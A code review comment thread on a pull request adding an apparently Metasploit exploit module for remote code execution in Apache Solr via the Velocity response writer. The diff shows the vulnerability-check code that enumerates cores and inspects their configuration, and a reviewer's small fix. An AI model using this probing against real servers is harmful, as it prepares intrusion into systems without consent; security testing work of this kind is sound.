modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,407 @@
+            'uri'     => '/solr/admin/cores'
+
+      })
+
+    # can't connect? that's yet another automatic failure
+    unless cores
+      return CheckCode::Unknown("Could not enumerate cores!")
+    end
+
+    # convert to JSON yet again
+    cores_json = cores.get_json_document
+    # draw up an array of all the cores
+    @cores_list = Array.new()
+    # if we are checking, we better have an array of all the exploitable cores
+    @possibly_vulnerable_cores = Array.new()
+    # get the core names
+    cores_json['status'].keys.each do |core_name|
+      @cores_list.push(core_name)
+    end
+
+    # no cores? that means nothing to exploit.
+    if @cores_list.length == 0
+      return CheckCode::Safe("No cores found, nothing to exploit!")
+    end
+
+    # got cores? tell the operator which cores were found
+    print_status("Found core(s): #{@cores_list.join(", ")}")
+    # for each core, attempt to get the config as JSON
+    @cores_list.each do |core_name|
+      core_config = send_request_cgi({
+                    'method'  => 'GET',
+                    'headers' => @headers,
+                    'uri'     => "/solr/#{core_name}/config"
+        })
+
+      # can't retrieve configuration for that core? go next
+      unless core_config
+        print_error("Could not retrieve configuration for core #{core_name}!")
+        next
+      end
+
+      # convert to JSON... for the third time
+      core_config_json = core_config.get_json_document
+      # if the core configuration does not include the Velocity Response Writer, go check the next core
+      unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
+        print_error("Velocity Response Writer not found in core #{core_name}")
+        next
+      else
+        print_good("Found Velocity Response Writer in use by core #{core_name}")
+        @possibly_vulnerable_cores.push(core_name)
+      end
+
+      # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+      if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
+        print_good("params.resource.loader.enabled for core '#{core_name}' is set to true.")
+        @params_resource_loader_enabled = true
+      else
+        print_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
+      end
+
+      # if we exploiting, the first core that fits the criteria is selected.
+      # whether or not the core has params.resource.loader.enabled is not a factor as
+      # we can attempt to modify it during the exploit
+      if @vuln_check == false
+        unless @possibly_vulnerable_cores == nil
+          @core_name = @possibly_vulnerable_cores[0]
+          return CheckCode::Vulnerable
+        else
+          return CheckCode::Safe
+        end
+      end
+    end
+
+    # for checking, look at the array of vulnerable cores
+    if @possibly_vulnerable_cores == nil
```

Comment:
You probably want to check `empty?` here.

```suggestion
    if possibly_vulnerable_cores.empty?
```

Reply:
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29